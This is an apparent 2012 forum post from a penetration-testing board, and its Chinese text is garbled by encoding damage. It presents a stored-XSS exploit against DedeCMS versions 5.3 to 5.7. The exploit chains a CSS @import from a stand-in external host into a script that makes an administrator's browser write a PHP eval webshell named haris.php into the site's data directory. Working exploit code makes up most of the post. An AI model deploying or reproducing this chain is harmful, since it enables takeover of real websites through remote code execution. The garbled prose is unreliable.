��̳ › web app��͸����::��Web App penetration testing�� › dedecms xss odayͨɱ���а汾 ��getshell

admin ������ 2012-9-15 13:56:10

dedecms xss odayͨɱ���а汾 ��getshell

<DIV id=read_tpc mb10?>©��ԭ�����ڱ༭�����˲��ϣ������¶���ű����С���getshell
Ϊʲô˵����ODay�أ���getshell�Ķ���OD��`(���߷�������Ҳ�ܱ���)
Ŀǰֻ�Dz��Թ�5.3��5.7�汾����������İ汾��Ҿ����ɷ��Ӱɡ�
����˵˵���÷�����
������2����
1.����ע��
2.����Ͷ��
ע���Ա----��������
�������
���ƴ���
<style>@im\port'\http://xxx.com/xss.css';</style>
�½�XSS.Css
���ƴ���
.body{
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
�½�xss.js ����Ϊ
���ƴ���
1.var request = false;
2.if(window.XMLHttpRequest) {
3.request = new XMLHttpRequest();
4.if(request.overrideMimeType) {
5.request.overrideMimeType('text/xml');
6.}
7.} else if(window.ActiveXObject) {
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
9.for(var i=0; i<versions.length; i++) {
10.try {
11.request = new ActiveXObject(versions);
12.} catch(e) {}
13.}
14.}
15.xmlhttp=request;
16.function getFolder( url ){
17. obj = url.split('/')
18. return obj
19.}
20.oUrl = top.location.href;
21.u = getFolder(oUrl);
22.add_admin();
23.function add_admin(){
24.var url= "/"+u+"/sys_sql_query.php";
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
26.xmlhttp.open("POST", url, true);
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
28.xmlhttp.setRequestHeader("Content-length", params.length);
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
30.xmlhttp.send(params);
31.}
������Ա�����ƪ���µ�ʱ�򣬽��Զ���dataĿ¼����һ�仰haris.php������cmd

�鿴�����汾: dedecms xss odayͨɱ���а汾 ��getshell